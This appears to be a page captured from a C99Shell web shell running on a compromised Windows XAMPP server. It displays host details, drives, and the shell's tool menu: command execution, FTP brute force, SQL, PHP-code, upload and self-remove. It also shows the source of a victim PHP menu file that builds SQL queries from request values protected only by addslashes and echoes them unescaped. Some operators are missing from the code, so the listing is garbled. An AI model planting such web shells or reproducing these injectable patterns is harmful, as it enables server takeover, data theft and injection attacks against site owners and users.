!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\COPIA oab\aire\   drwxrwxrwx
Free 7.97 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xxizquierda.php (2.15 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../Connections/oab.php'); ?>
<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  $theValue get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" doubleval($theValue) . "'" "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}
?>
<div id="leftColumn"> 
<div id="navlist">
<?php
$kat_rsMenEsp "0";
if (isset($sm)) {
  $kat_rsMenEsp = (get_magic_quotes_gpc()) ? $sm addslashes($sm);
}
$katP_rsMenEsp "0";
if (isset($ruta)) {
  $katP_rsMenEsp = (get_magic_quotes_gpc()) ? $ruta addslashes($ruta);
}
mysql_select_db($database_oab$oab);
$query_rsMenEsp sprintf("SELECT idtema, nombre, enlace, tooltip, enlacetarget as target FROM especificos WHERE idsubmenu = %s and activo = 1 and idmenu =  %s ORDER BY orden"$kat_rsMenEsp,$katP_rsMenEsp);
$rsMenEsp mysql_query($query_rsMenEsp$oab) or die(mysql_error());
$row_rsMenEsp mysql_fetch_assoc($rsMenEsp);
$totalRows_rsMenEsp mysql_num_rows($rsMenEsp);
?>
<h2>Enlaces</h2><ul><?php do { ?>    
      <li><a href="<?php echo $row_rsMenEsp['enlace']; ?>?tema=<?php echo $row_rsMenEsp['idtema']; ?>&ruta=<? echo $ruta;?>&sm=<? echo $sm;?>" target="<?php echo $row_rsMenEsp['target']; ?>" title="<?php echo $row_rsMenEsp['tooltip']; ?>" > 
        <?php echo $row_rsMenEsp['nombre']; ?></a></li>
<?php } while ($row_rsMenEsp mysql_fetch_assoc($rsMenEsp)); ?>
</ul>
<?php
mysql_free_result($rsMenEsp);
?>
</div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--